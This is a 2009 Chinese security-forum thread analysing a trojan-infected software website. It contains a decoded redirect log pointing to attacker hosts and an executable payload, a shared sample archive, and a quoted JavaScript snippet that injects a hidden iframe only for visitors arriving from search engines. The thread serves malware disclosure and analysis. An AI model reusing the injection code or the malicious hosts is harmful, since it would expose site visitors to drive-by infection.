收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) 飞秋官网 www.feiq18.com 有木马 挂马by:taoyuan237
12下一页
返回列表 发新帖
查看: 4650|回复: 18
收起左侧

[已鉴定] 飞秋官网 www.feiq18.com 有木马 挂马by:taoyuan237

[复制链接]
nanan3061
发表于 2009-7-26 16:18:42 | 显示全部楼层 |阅读模式
飞秋官网 www.feiq18.com  有木马
这个网站一打开 360 报有网页木马
把360关了 卡巴斯基报木马

[ 本帖最后由 taoyuan237 于 2009-7-26 16:32 编辑 ]
回复

举报

taoyuan237
发表于 2009-7-26 16:32:10 | 显示全部楼层
关于:hxxp://www.feiq18.com/解密的日志(全体输出 -  16):

Level  0>http://www.feiq18.com/
Level  1>http://www.feiq18.com/include/js/common.js?ivc
Level  2>http://disk.e165.com/new.js
Level  3>http://fdsa332dd.3322.org/ok/06.htm?03
Level  4>http://js.tongji.linezing.com/1213759/tongji.js
Level  4>http://fdsa332dd.3322.org/ok/fdsgfdsgrre44556431.html
Level  5>http://fdsa332dd.3322.org/ok/jhgftrdsa.htm
Level  6>http://55566884.3322.org/alg.exe
Level  5>http://fdsa332dd.3322.org/ok/gfddtt.htm
Level  6>http://fdsa332dd.3322.org/ok/go1.jpg
Level  6>http://fdsa332dd.3322.org/ok/go.jpg
Level  7>http://55566884.3322.org/alg.exe
Level  2>http://www.feiq18.com/include/js/src
Level  2>http://www.feiq18.com
Level  1>http://pagead2.googlesyndication.com/pagead/show_ads.js
Level  2>http://googleads.g.doubleclick.net/pagead/test_domain.js

日志由 Redoce2.0第13次修正版于 2009/7/26 16:31:54 生成。
回复

举报

nanan3061
 楼主| 发表于 2009-7-26 16:39:49 | 显示全部楼层
tf 或者 Comodo Firewall 或者Mamutu 只开其中一个能防住吗
我不敢试 请教
回复

举报

29159011
发表于 2009-7-26 16:47:37 | 显示全部楼层
TO KIS2010

病毒样本.rar

46.51 KB, 下载次数: 86

密码:infected
回复

举报

nanan3061
 楼主| 发表于 2009-7-26 17:05:43 | 显示全部楼层
为什么上这个网站 现在又没有提示木马啦 一阵一阵的??
回复

举报

taoyuan237
发表于 2009-7-26 17:08:16 | 显示全部楼层
原帖由 nanan3061 于 2009-7-26 17:05 发表
为什么上这个网站 现在又没有提示木马啦 一阵一阵的??

只要是从下面的搜索进去的都会执行挂马,某则不会执行.
引用:
var url=document.referrer;
var p=url.toLowerCase().indexOf("www.baidu.com","search.cn.yahoo.com","www.soso.com","search.114.vnet.cn","zhidao.baidu.com","seek.3721.com","www.sogou.com","www.google.cn");
if (p>0)
{
document.writeln("<iframe src=http:\/\/fdsa332dd.3322.org\/ok\/06.htm?03 width=111 height=0 border=0><\/iframe>");
}
回复

举报

nanan3061
 楼主| 发表于 2009-7-26 17:12:10 | 显示全部楼层
说的通俗点 那是网站本身有问题 还是搜索引擎有问题 还是???
  为什么
回复

举报

taoyuan237
发表于 2009-7-26 17:16:28 | 显示全部楼层
原帖由 nanan3061 于 2009-7-26 17:12 发表
说的通俗点 那是网站本身有问题 还是搜索引擎有问题 还是???
  为什么

网站本身有病毒
只不过不会主动执行
只有他判断你是从搜索引擎上连接过来的时候才会执行
回复

举报

nanan3061
 楼主| 发表于 2009-7-26 17:20:47 | 显示全部楼层
那岂不是说这个网站属于恶意网站?
回复

举报

尤金卡巴斯基
发表于 2009-7-26 19:27:06 | 显示全部楼层
url to KL
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-11 04:14 , Processed in 0.126136 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表